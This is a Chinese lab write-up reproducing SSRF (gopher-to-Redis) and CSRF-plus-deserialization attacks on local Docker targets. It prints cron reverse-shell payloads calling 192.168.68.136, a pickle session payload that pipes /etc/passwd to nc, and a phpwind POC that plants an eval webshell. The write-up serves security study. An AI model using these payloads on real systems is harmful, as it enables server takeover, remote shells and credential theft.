SSRF和CSRF实战复现
文章目录
- SSRF
- Web-Hacking-Lab-master
- 1、Centos未授权访问
- 2、Ubuntu未授权访问
- 3、Ubuntu传入公钥访问
- 4、ssrf_redis_lab_pickle_redis_lab
- CSRF:windphp
SSRF
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。
file–>读取文件
dict–>探测端口
gopher–>实现入侵
多以gopher+redis+fastcgi结合入侵
gopher+redis :1、上传webshell(必须知道它的物理路径、redis权限要求够高、redis没有密码、安全模式必须关闭)2、写ssh 3、cron写任务计划(在Ubuntu上不成功因为文件创建权限为644,必须为600)4、利用CRLF换行头漏洞,用ssrf把redis的session写入进去,写入过程中会用python进行一个序列化,然后在redis进行读取的时候将session进行反序列化执行我们传入的代码
Web-Hacking-Lab-master
1、Centos未授权访问
1、docker拉取镜像
2、本地浏览器访问服务器2222端口,进入页面
3、进行端口探测
1)输入dict://127.0.0.1:6379发现服务器6379是开放的
2)使用工具进行时间计划写入反弹shell,生成payload
3)将payload进行url解码了解原理:
gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$73
*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/7777 0>&1'
*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit
总结:第一步清除redis数据以免影响我们写入数据(实战中不可取),set一个键,输入我们的反弹代码,然后将这个键值在Linux系统里落盘,落盘路径是/var/spool/cron/,文件名root。
4)将工具生成的payload的输入进页面,提交。
5)本机进行监听端口7777。
2、Ubuntu未授权访问
1、docker拉取镜像
2、本地浏览器访问服务器1111端口,进入页面
3、进行端口探测
1)输入dict://127.0.0.1:6379发现服务器6379是开放的
2)使用工具进行时间计划写入反弹shell,生成payload
代码分析:
gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$75
*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/6666 0>&1'
*4
$6
config
$3
set
$3
dir
$24
/var/spool/cron/crontabs
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit
总结:基本与上同,只是落盘路径不一样,Ubuntu落盘文件是/var/spool/cron/crontabs。
3)提交payload,发现失败,无法反弹shell,可能原因有,①落盘路径不可写 ②Ubuntu的计划文件权限必须是600③redis版本没有漏洞(建议靶场使用redis5.0.5版本)
4)Ubuntu时间计划写入反弹shell失败。
3、Ubuntu传入公钥访问
1、拉取环境
2、生成公钥:
ssh-keygen -t rsa
3、用本机工具生成payload生成公钥
4、传入payload,结果如下:
由于redis版本是stable,长期稳固版本,公钥传入失败。
5、我自己在docker环境里传入我的公钥试试,然后ssh远程登录,发现成功。
4、ssrf_redis_lab_pickle_redis_lab
1、拉取环境,访问反序列化的环境页面,分析app.py文件的代码,发现系统是将session里的cookie进行base64加密序列化,然后使用的时候是将cookie进行反序列化base64解密,我们可以通过对传入的session进行伪造,写入我们的代码进行base64加密并序列化,等系统使用的时候会反序列化执行我们的代码。(flask里会默认将session进行重置,即当你覆盖完原本的session值,在执行完流程后会自动变为原本的session值)
2、查看payload原理
http://127.0.0.1:6379/_
*3
$3
set
$44
session:e6d2a82e-cafb-44c1-91ac-3b271a29f24c
$92
Y3Bvc2l4CnN5c3RlbQpwMAooUydjYXQgL2V0Yy9wYXNzd2QgfCBuYyAxMjcuMC4wLjEgOTA5MScKcDEKdHAyClJwMwou
3、提交payload
python的httplib自动把%0D%0A过滤了,有些python版本会过滤,有些不会,反正就尝试一下嘛。
CSRF:windphp
- 回调函数 call_user_func_array()
- spl_autoload 、 spl_autoload_register 、 __autoload 三个函数
- 利用数组+命名空间加载相同名字的类
- 利用StdClass代替对象数组
- **将CSRF和反序列化结合,从而使只能在后台触发的序列化漏洞,变为前台getshell。降低漏洞利用条件。**
- CSRF利用技巧
POC:
<?php
namespace src\library\utility {
class PwDelayRun{
}
}
namespace{
class PwDelayRun{
private $_callback;
private $_args;
function __construct()
{
$this->_callback = [
'assert'
];
$this->_args = [
["phpinfo();exit;"]
];
}
}
header("Content-Type: text/plain");
$obj = new stdClass();
$obj->a = new src\library\utility\PwDelayRun();
$obj->b = new PwDelayRun();
echo urlencode(serialize($obj));
}
?>
拿到payload:
http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D
1、创建一个php文件,x写入如下代码:
<?php
header("Content-Type: image/gif");
header("Location: http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A77%3A%22file_put_contents%28%22.%2Fshell.php%22%2C%27%3C%3Fphp+%40eval%28%24_POST%5Ba%5D%29%3B%3F%3E%27%29%3B+phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D");
?>
2、发帖,发图片,选择用代码发,代码如下:
[img]http://127.0.0.1/oupeng.php[/img]
3、可以看到此时没有shell文件
4、登录管理员账号
5、此时出现shell.php文件,反弹shell
6、测试显示成功